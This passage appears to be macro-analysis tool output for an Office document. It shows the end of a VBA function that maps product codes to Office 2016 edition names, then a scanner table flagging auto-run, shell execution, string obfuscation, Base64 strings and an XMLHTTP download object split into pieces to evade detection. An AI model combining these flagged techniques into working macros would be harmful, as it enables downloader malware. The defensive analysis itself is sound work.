  622.  GetEdition2016 = "Microsoft Office OneDrive for Business 2016"
  623.  Case "110D"
  624.  GetEdition2016 = "Microsoft Office SharePoint Server 2016"
  625.  Case "012B"
  626.  GetEdition2016 = "Microsoft Skype for Business 2016"
  627.  Case Else
  628.  MsgBox "Error: GetEdition2016", vbCritical, "ERROR"
  629.  End Select
  630. End Function
  631.  
  632.  
  633. +------------+----------------------+-----------------------------------------+
  634. | Type       | Keyword              | Description                             |
  635. +------------+----------------------+-----------------------------------------+
  636. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
  637. | Suspicious | Open                 | May open a file                         |
  638. | Suspicious | Shell                | May run an executable file or a system  |
  639. |            |                      | command                                 |
  640. | Suspicious | WScript.Shell        | May run an executable file or a system  |
  641. |            |                      | command                                 |
  642. | Suspicious | Run                  | May run an executable file or a system  |
  643. |            |                      | command                                 |
  644. | Suspicious | Windows              | May enumerate application windows (if   |
  645. |            |                      | combined with Shell.Application object) |
  646. | Suspicious | Shell.Application    | May run an application (if combined     |
  647. |            |                      | with CreateObject)                      |
  648. | Suspicious | CreateObject         | May create an OLE object                |
  649. | Suspicious | CallByName           | May attempt to obfuscate malicious      |
  650. |            |                      | function calls                          |
  651. | Suspicious | Chr                  | May attempt to obfuscate specific       |
  652. |            |                      | strings                                 |
  653. | Suspicious | ADODB.Stream         | May create a text file                  |
  654. | Suspicious | Write                | May write to a file (if combined with   |
  655. |            |                      | Open)                                   |
  656. | Suspicious | Microsoft.XMLHTTP    | May download files from the Internet    |
  657. |            |                      | (obfuscation: VBA expression)           |
  658. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
  659. |            |                      | may be used to obfuscate strings        |
  660. |            |                      | (option --decode to see all)            |
  661. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
  662. |            | Strings              | may be used to obfuscate strings        |
  663. |            |                      | (option --decode to see all)            |
  664. | VBA string | Microsoft.XMLHTTP    | ("Microsoft" + ".XMLHTTP")              |
  665. +------------+----------------------+-----------------------------------------+